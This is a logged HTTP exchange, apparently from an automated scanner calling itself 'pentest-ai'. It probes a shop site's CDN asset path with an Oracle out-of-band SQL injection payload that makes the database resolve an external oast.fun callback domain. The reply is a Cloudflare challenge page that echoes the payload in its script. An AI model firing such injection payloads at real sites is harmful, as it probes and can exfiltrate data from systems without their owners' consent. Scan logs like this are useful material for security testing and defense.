REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/%27%20%7C%7C%20%28SELECT%20UTL_INADDR.GET_HOST_ADDRESS%28%27h0cqg45t8jh21623dc0zy9y9ayz8q5sfn.oast.fun%27%29%20FROM%20dual%29%20%7C%7C%20%27/assets/component-localization-form.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9956
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847ab8864a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=MSsIm3nq0BbtbxCP9aC9HuWJvXZ26RGkrTOv8%2Femv%2BeybS7bG1qiLERWAB71WuEqJv3fkI6xIjCoYQm3oVOUhD1Z83J8y8hvGE9V%2FUan7hV0ppkyVhZ%2FA%2F9xoy5xmu8Qww%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847ab8864a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'CG4awOfn2mbuQhsW6.YwEHGgY6jw8XUIAWXcUM6WgxA-1784281171-1.2.1.1-FJKEYXM6ViUE0LGNTRJwovtOsunzJNE53yBVKVIvHJfo0OZAQD6Mmy9O74z_eewC',cITimeS: '1784281171',cRay: 'a1c847ab8864a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/'%20%7C%7C%20(SELECT%20UTL_INADDR.GET_HOST_ADDRESS('h0cqg45t8jh21623dc0zy9y9ayz8q5sfn.oast.fun')%20FROM%20dual)%20%7C%7C%20'/assets/component-localization-form.css?__cf_chl_tk=duw2iZrZ9Oigh_ozMWHNd.sjvtOD7twIVdlh7W7rgI8-1784281171-1.0.1.1-U9tghXHevZ1YHuYMxtjdMrwETGVr1ozQcmiLO3Mz3Cg",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/'%20%7C%7C%20(SELECT%20UTL_INADDR.GET_HOST_ADDRESS('h0cqg45t8jh21623dc0zy9y9ayz8q5sfn.oast.fun')%20FROM%20dual)%20%7C%7C%20'/assets/component-localization-form.css?__cf_chl_f_tk=duw2iZrZ9Oigh_ozMWHNd.sjvtOD7twIVdlh7W7rgI8-1784281171-1.0.1.1-U9tghXHevZ1YHuYMxtjdMrwETGVr1ozQcmiLO3Mz3Cg",md: 'fYV5zM7k3SXaIYtYbiNVhX.TnDjGDMJxZQoa.1Lv6Vw-1784281171-1.2.1.1-xowd73fnaQXVn7Zhg.yYyLQhpVQVPh9l5450XlEQa7jb8ra.Pr6KEY8pN7R_5i5cP16.vjFNeTr4EtS32c6fqoo2xup5dGK87CePwUwBT5UBwAO34H7yY8u6YYKZfzcqgyHvwd1anvn_N_MlgT0dKV2HCuJ.qw0n9OXpeKfxqpMBkA.hCJ7odOhZgvDipDhnEXgMdg7Z99pKujkPgXfxn07lU8A32t9xKd7SBSuglVXxrv5or__fS_kUF9gHLaaIAD5JAFetP2ehb8.HbgGHwsHQWI9jJcYSTPmaH_MJBxtu3R.evGfcS7blo0JWfGG6QXCME6ReFoP2bGnWdXh5EG73lZ.7vXFd8nGDZgWaSM6KVBsPY.3btKnXInWoqf8IZt.2HIOW4naFSwzk20WmrlW3rKNbpp_NAwg4XN2IEWqqciK1diQbwJRg_GzQ1KEzNW7vbPh4JhtIDJL9kdZSXHiwHWbjw0HbhfWdrCuTJDUcEo3UOv3DRPWv_b9VoBBQKrfpSUyR1HXkMX0czfZuX0NjcWReuw6xwkogeQltHPzslxA..gI7dtY_o6FKkVZ0P1.7KepGqYj5Ce0LF7A3KYhaupDP4Gn6S5Bg_ZOpZDcoxUbWXXXkTzVhsA0xtJR9Hc0bS5Xb6Py98hkvRcHZHk5SlvyzCAZUKVNGSTlolgV3XWE0jpp42tNaQiuKf2O_AtVX5uxSl0zKxwDtbiDTuhXzG.sTp5ZQS7sd1AE8EeqZDhGUxdpHB47kbQaHDm.dnDMZQjI26KgKN5fVp_SMX4VONL0_rUxGICtWs03OYzdeygYwPV81e43PWYXLXhnYpThmK6D4D_Zyhi9sXNoEyHKk6eoLrV7htBkwmgrxwvYTgk9PBNBPVKtWglCGkmItK1pRPrgeGyxLnjob.Nz0.vVkPzYbpAA0uRlCc2IQEbCUafeA4eGbwPODYIn2zb2Op1diYmLIxbcor_Pjbjwr8InuOO9sZErqx2BrhsSu44.mYTTNYAiCCpNfkm3jcJcSj3LbLB_buNVCVKYTic1cWSYsuZ6nPoU6UoCm5xBpziW_0qs7qswPChXVuImb7n3GG.u4ZGqlsO0qy5GSxiHnBPYHAvC1RX9ixJiHMrMmn.X1X94jvnrBHAiH7x58RW2sq3J4iqdhA6yebmlxnHlc9OLCJn_qEqGUXIgKmp2lfAz6RrjSFAOwVHV0z_H4HPkHiouSNvFfUaO1bDBiOZc_rXM02rmTvGYjTKTNX0obg53GlxoAN5fl1CSV3tuqIQ4iNY.h.laUN9uFKPJYAPOfa8yte_onZK2dE7iWUJMvwAtUsXfJCf0S7EN18wirkHApIZx4inc8k_mRRs_obt7NE172QJ73XB5pesMnMFMDxRQ',mdrd: 'VeF.rlO8lozgwNyFABuaxBc7khW7FKomGnw1SEZ_5uM-1784281171-1.2.1.1-uDHfjMjqkRksreZaauPS4kTD._WEbM03JRIFdbfTIWe3Dekd.tRqZheC_N0MHAG8mLXriKnwB1xaCfnNPKQpgFAnU3REtkDcu8jphvEEG70mMx0l0T2tQwOYcvkMNu.wicYaUM0LknPOSgn3N2DF6LQj8RGa0EdXVLJB_N.0Naszogzu7laj8MWYMGT3cdc2nzU94VY9pnaGnXPMDE_nlLIxHy5GkYwjiErNl8x..GyWPpU6c6UNw.hsVNlA5pbN',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847ab8864a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/'%20%7C%7C%20(SELECT%20UTL_INADDR.GET_HOST_ADDRESS('h0cqg45t8jh21623dc0zy9y9ayz8q5sfn.oast.fun')%20FROM%20dual)%20%7C%7C%20'/assets/component-localization-form.css?__cf_chl_rt_tk=duw2iZrZ9Oigh_ozMWHNd.sjvtOD7twIVdlh7W7rgI8-1784281171-1.0.1.1-U9tghXHevZ1YHuYMxtjdMrwETGVr1ozQcmiLO3Mz3Cg"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
